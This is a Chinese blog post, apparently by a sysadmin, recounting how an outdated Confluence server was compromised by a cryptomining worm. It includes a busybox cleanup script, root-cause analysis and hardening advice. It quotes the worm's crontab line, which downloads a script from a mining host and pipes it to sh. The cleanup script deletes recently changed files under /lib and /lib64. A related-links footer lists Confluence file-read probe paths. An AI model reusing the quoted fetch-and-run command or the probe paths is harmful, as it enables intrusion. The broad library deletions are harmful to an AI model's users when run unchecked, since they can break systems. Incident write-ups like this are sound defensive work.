Confluence漏洞导致服务器被入侵

最新推荐文章于 2024-07-18 10:27:28 发布
最新推荐文章于 2024-07-18 10:27:28 发布
阅读量2.2k 收藏
点赞数
分类专栏: Linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wjy1990831/article/details/96307980
版权

一、问题描述

7.17凌晨1点左右,突然接收到服务器报警CPU达到100%,负载飙高,TCP连接数明显突增,部分业务无法正常访问。

紧急登入服务器进行排查,top发现polkitds占用大量CPU,kill进程后,隔了几分钟CPU再次飙高,last,w等命令无法正常使用,怀疑受到病毒攻击,排查crontab时发现如下计划任务且删除无效,同时.bashrc也发现相同命令:

*/15 * * * * (curl -fsSL lsd.systemten.org|wget -q -o- lsd.systemten.org)|sh ##

查询发现lsd.systemten.org是一个挖矿网站,故确定中了挖矿病毒

二、处理方式

参考:https://blog.csdn.net/u010457406/article/details/89328869

切断服务器网络,前往busybox官网下载最新版安装包busybox-1.30.1.tar.bz2,安装过程如下:

cd busybox-1.30.1/
make defconfig
make
make install
ln -s `pwd`/busybox /usr/bin/busybox
busybox|grep BusyBox |grep v

编写busybox修复脚本

#!/bin/bash
#可以重复执行几次,防止互相拉起导致删除失败

function installBusyBox(){
    #参考第一段
    busybox|grep BusyBox |grep v
}

function banHosts(){
    #删除免密认证,防止继续通过ssh进行扩散,后续需自行恢复,可不执行
    busybox echo "" > /root/.ssh/authorized_keys
    busybox echo "" > /root/.ssh/id_rsa
    busybox echo "" > /root/.ssh/id_rsa.pub
    busybox echo "" > /root/.ssh/known_hosts
    busybox echo "" > /root/.ssh/auth
    #iptables -I INPUT -p tcp --dport 445 -j DROP
    busybox echo -e "\n0.0.0.0 pastebin.com\n0.0.0.0 thyrsi.com" >> /etc/hosts
}


function fixCron(){
    #修复crontab
    busybox chattr -i  /etc/cron.d/root  2>/dev/null
    busybox rm -f /etc/cron.d/root
    busybox chattr -i /var/spool/cron/root  2>/dev/null
    busybox rm -f /var/spool/cron/root
    busybox chattr -i /var/spool/cron/tomcat  2>/dev/null
    busybox rm -f /var/spool/cron/tomcat
    busybox chattr -i /var/spool/cron/crontabs/root  2>/dev/null
    busybox rm -f /var/spool/cron/crontabs/root
    busybox rm -rf /var/spool/cron/tmp.*
    busybox rm -rf /var/spool/cron/crontabs
    busybox touch /var/spool/cron/root
    busybox chattr +i /var/spool/cron/root
}

function killProcess(){
    #修复异常进程
    busybox ps -ef | busybox grep -v grep | busybox grep 'kerberods' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9 2>/dev/null
    busybox ps -ef | busybox grep -v grep | busybox grep 'khugepageds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9  2>/dev/null
    busybox ps -ef | busybox grep -v grep | busybox egrep 'ksoftirqds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9  2>/dev/null
    busybox ps -ef | busybox grep -v grep | busybox egrep 'kthrotlds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9  2>/dev/null
    busybox ps -ef | busybox grep -v grep | busybox egrep 'kpsmouseds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9  2>/dev/null
    busybox ps -ef | busybox grep -v grep | busybox egrep 'kintegrityds' | busybox awk '{print $1}' |busybox sed "s/root//g" | busybox xargs kill -9  2>/dev/null
    busybox rm -f /tmp/khugepageds
    busybox rm -f /usr/sbin/kerberods
    busybox rm -f /usr/sbin/kthrotlds
    busybox rm -f /usr/sbin/kintegrityds
    busybox rm -f /usr/sbin/kpsmouseds
    busybox find /tmp -mtime -4 -type f | busybox xargs busybox rm -rf
}


function clearLib(){
    #修复动态库
    busybox rm -f /etc/ld.so.preload
    busybox rm -f /usr/local/lib/libcryptod.so
    busybox rm -f /usr/local/lib/libcset.so
    busybox chattr -i /etc/ld.so.preload 2>/dev/null
    busybox chattr -i /usr/local/lib/libcryptod.so  2>/dev/null
    busybox chattr -i /usr/local/lib/libcset.so 2>/dev/null
    busybox find /usr/local/lib/ -mtime -4 -type f| busybox xargs rm -rf
    busybox find /lib/ -mtime -4 -type f| busybox xargs rm -rf
    busybox find /lib64/ -mtime -4 -type f| busybox xargs rm -rf
    busybox rm -f /etc/ld.so.cache
    busybox rm -f /etc/ld.so.preload
    busybox rm -f /usr/local/lib/libcryptod.so
    busybox rm -f /usr/local/lib/libcset.so
    busybox rm -rf /usr/local/lib/libdevmapped.so
    busybox rm -rf /usr/local/lib/libpamcd.so 
    busybox rm -rf /usr/local/lib/libdevmapped.so
    busybox touch /etc/ld.so.preload
    busybox chattr +i /etc/ld.so.preload
    ldconfig
}

function clearInit(){
    #修复异常开机项
    #chkconfig netdns off 2>/dev/null
    #chkconfig –del netdns 2>/dev/null
    #systemctl disable netdns 2>/dev/null
    busybox rm -f /etc/rc.d/init.d/kerberods
    busybox rm -f /etc/init.d/netdns
    busybox rm -f /etc/rc.d/init.d/kthrotlds
    busybox rm -f /etc/rc.d/init.d/kpsmouseds
    busybox rm -f /etc/rc.d/init.d/kintegrityds
    #chkconfig watchdogs off 2>/dev/null
    #chkconfig --del watchdogs 2>/dev/null
    #chkconfig --del kworker 2>/dev/null
    #chkconfig --del netdns 2>/dev/null
}

function recoverOk(){
    service crond start
    busybox sleep 3
    busybox chattr -i /var/spool/cron/root
    echo "OK,BETTER REBOOT YOUR DEVICE"
}

#先停止crontab服务
service crond stop
#防止病毒继续扩散
banHosts
#清除lib劫持
clearLib
#修复crontab
fixCron
killProcess
clearLib
killProcess
#删除异常开机项
clearInit
fixCron

recoverOk

如果查杀不成功,重复进行多次查杀,尽量在短时间内完成所有操作并重启,防止病毒利用已加载的动态链接库恢复感染!!!

三、分析病毒来源

参考:https://www.freebuf.com/vuls/200477.html

通过查询发现confluence最近发布一个新的漏洞,Confluence Server与Confluence数据中心中的Widget连接器存在服务端模板注入漏洞,攻击者能利用此漏洞能够实现目录穿越与远程代码执行。

涉及版本:影响版本6.6.7之前的所有版本的Confluence Server和Confluence数据中心,6.8.5之前的版本6.7.0(6.8.x的固定版本),6.9.3之前的6.9.0版本(6.9的固定版本)

服务器上安装了confluence-6.8.1,导致此次挖矿病毒入侵

四、安全加固

1.定期查看已安装的软件是否发布漏洞警告,及时升级版本或补丁

2.谨慎使用免密登录

3.禁止ROOT登录,在特殊需求下再开启

OPS运动狂-JoyWang
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Wazuh部署记录
墨痕诉清风的博客
04-29 215
Wazuh是一个免费的开源安全平台,统一了XDR和SIEM功能。它可以保护内部部署、虚拟化、容器化和基于云的环境中的工作负载。Wazuh帮助组织和个人保护其数据资产免受安全威胁。它被全球数千个组织广泛使用,从小型企业到大型企业。443:仪表盘界面访问端口1515:探针连接服务器端口1514:探针回传信息端口以上3个端口必须打开防火墙。
挖矿应急响应小结
bloodzer0
03-04 1042
背景:总结一下遇到挖矿时应该如何做应急响应与溯源分析。 1. 挖矿特征分析 当服务器或PC处于什么样的状态时,我们可以判定为被挖矿。通常来说,当我们的服务器或PC资源(CPU)使用率接近或超过100%,并持续高居不下导致服务器或PC操作延缓,我们就可以判定被挖矿。常见挖矿其它特征如下: 服务器或PC访问[过]不受信任的地址,这些地址包括:主机、IP、域名。这是由于大部分挖矿都需要从一个不受信任的...
警惕!利用Confluence最新漏洞传播的Linux挖矿病毒seasame
systemino的博客
04-25 2728
一、现象描述 近日,深信服EDR产品率先检测到一款新型Linux挖矿木马,经深信服安全专家分析,该病毒利用Confluence漏洞传播,通过定时下载对病毒体进行保活,同时由于病毒会杀掉包含“https://”、“http://”的进程,将导致用户无法下载文件及访问网页,挖矿进程会导致服务器出现卡顿等异常现象。深信服安全团队对该挖矿木马进行了详细的技术分析,并根据其母体文件名将其命名为seasam...
Confluence文件读取漏洞复现
Websec
03-06 1329
1、Confluence系统都存在漏洞漏洞poc如下: /s/xx/_/;/WEB-INF/web.xml /s/xx/_/;/WEB-INF/decorators.xml /s/xx/_/;/WEB-INF/classes/seraph-config.xml /s/xx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties /s/xx/_/;/META-INF/maven/com.atlassian.jir
漏洞复现】CVE-2024-21683:Confluence远程代码执行漏洞
最新发布
网络安全从业者的学习笔记
07-18 691
Atlassian Confluence 是一款功能强大的企业协作软件,专为团队协作、知识管理和内容共享而设计。它提供了一个集中的平台,团队可以共同创建、编辑和共享文档、会议记录、项目计划以及技术文档。经过管理员身份验证的远程威胁者可构造恶意请求,利用该漏洞在受影响的实例上执行任意代码,而无需用户交互。
利用 Confluence 漏洞的挖矿木马
Nikkis的博客
02-08 512
利用 Confluence 漏洞的挖矿木马
悬镜安全强烈推荐丨内网安全检查/渗透总结,先收藏再说
Anprou的博客
07-06 6414
浏览文章的时候,能够看到一篇干货满满的文章,实属不易,能够把内网安全渗透测试的整个阶段所涉及到的信息整理的如何全面也是值得佩服,废话不多说,直接上文章。本篇文章首发平台先知社区,如需转载,请标注来源。阅读本篇文章大约需要15分钟,建议先收藏,慢慢看。修订记录编号日期修订内容12018.5.18初稿A2B2C2A3B3C31. 内网安全检查/渗透介绍1.1 攻击思路有2种思路:攻击外网服务器,获取外...
Confluence跨大版本升级记录
gjjumin的专栏
01-10 1437
初始版本7.4.18最终升级到了目前的最新版本8.7.1,在升级过程中遇到了很多问题,庆幸的是最后都解决了,记录一下。
2023年攻防演练利器之必修高危漏洞合集(包含详细修复建议)
08-03
3. **Atlassian Confluence 远程代码执行漏洞**:Confluence是企业级协作平台,这类漏洞可能让攻击者通过恶意构造的请求执行代码,建议安装官方发布的安全补丁。 4. **Apache Commons Text 远程代码执行漏洞**:...
Centos7系统安全漏洞及修复方案
热门推荐
sara的博客
04-20 2万+
以下所有漏洞均为Centos7的系统漏洞修复,为离线内网环境;某些服务由Docker镜像部署。 1、Docker Remote API 未授权访问漏洞【原理扫描】 详细描述 Docker是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的容器中,然后发布到任何流行的LINUX机器上,也可以实现虚拟化。 Docker swarm 是一个将docker集群变成单一虚拟的docker host工具,使用标准的Docker API,能够方便docker集.
docker confluence挖矿病毒处理及版本升级
qq_41411704的博客
09-14 1891
【前提】 公司自建的confluence 被植入挖矿病毒了。导致cpu异常,疯狂的对外发包。 一【排查】 docker 版本 6.7.2 cptactionhank/atlassian-confluence:6.7.2 1.挖矿病毒:kdevtmpfsi kinsing solrd 就是换着名称来挖矿。 1.定位病毒 #查找出异常的pid,直接kill top #查找出关联下此进程的pid,可以找到父进程等信息 systemctl status pid 2.处理病毒 禁用定时任务,删除异常目录,删除源头 c
用nginx解决confluence,pojie后cpu使用率100%方案
czyfengye的博客
07-25 2157
删除confluence用户定时任务 ,查看目录 /var/spool/cron下是否有confluence用户的job,确认并删除。重启confluence : /opt/atlassian/confluence/bin/stop-confluence.sh。删除/opt/atlassian/confluence/temp目录下confluence用户创建的所有目录和文件。文件位置 /opt/atlassian/confluence/conf/server.xml,添加代理配置。nginx 增加配置。
Confluence】打开缓慢
Catherine_G的博客
12-02 1969
③JVM内存调大:参考☞ http://www.cnblogs.com/ding2016/p/7568436.html https://www.cnblogs.com/kevingrace/p/9413353.html。②confluence配置问题:vim /var/atlassian/application-data/confluence/confluence.cfg.xml。2 协同编辑的8091端口被占用 关闭后再测试。①硬件问题:升级硬件(cpu或者内存…3 部署服务器的CPU占用率过高。
Linux下Confluence经常跑死问题解决方案
weixin_34126215的博客
12-22 5426
症状 症状1:启动较慢、发现经常启动过程,tomcat就死掉了、点击一些页面,tomcat就死掉、在线人数过多tomcat就死掉了。 症状2:发现confluence能正常运行,但是时间一久tomcat就自动死掉了。 解决办法 对于症状1:请将tomcat的JVM内存配置大点。在安装目录的bin/catalina.sh 文件的cygwin=false上面加上: JAVA_OPTS="-Xm...
记录一次项目中cpu100%的解决方法(思路)
skyfans的博客
11-21 1105
由于实际情况没有进行截图,所以这里的截图已测试环境的情况截图说明 测试分析流程思路为:进程ID->线程ID->线程函数调用栈->函数耗时和调用统计->源代码分析 1.通过top命令找到可疑进程PID,记录进程PID=3122 top 2.找出消耗资源最高的线程 top -H -p 3122 使用gstack命令查看进程中各线程的函数调用栈 gstack 313...
confluence中kthreaddk挖矿病毒处理
weixin_44024436的博客
09-13 251
confluence中kthreaddk挖矿病毒处理
阿里云服务器遭受挖矿程序的入侵的清理之战
NicolasLearner的博客
04-02 910
1. 背景 最近在阿里云服务器上安装了缓存redis,由于没有设置密码,并且开放了6379端口,遭受了挖矿程序攻击。操作系统为centos7。 2. 排查 (1)使用top命令,cpu使用率很少,几乎为0,该图只是演示,不是当时情况,当时情况:cpu使用率为0,空闲100%,明显很有问题 这个时候,说明挖矿程序改变你的服务器,看到的并不真实,这个时候需要一个命令:vmstat 你会发现us为99 id几乎为0 (2)查看Linux的定时任务cron,使用命令crontab -l 命令查看所有的定时任
Confluence漏洞
07-28
Confluence漏洞是指在Confluence Server或Data Center的特定版本中存在的安全漏洞,攻击者可以通过构造恶意数据执行OGNL表达式进行注入攻击,最终控制服务器。\[1\]受影响的版本包括Confluence Server & Confluence ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值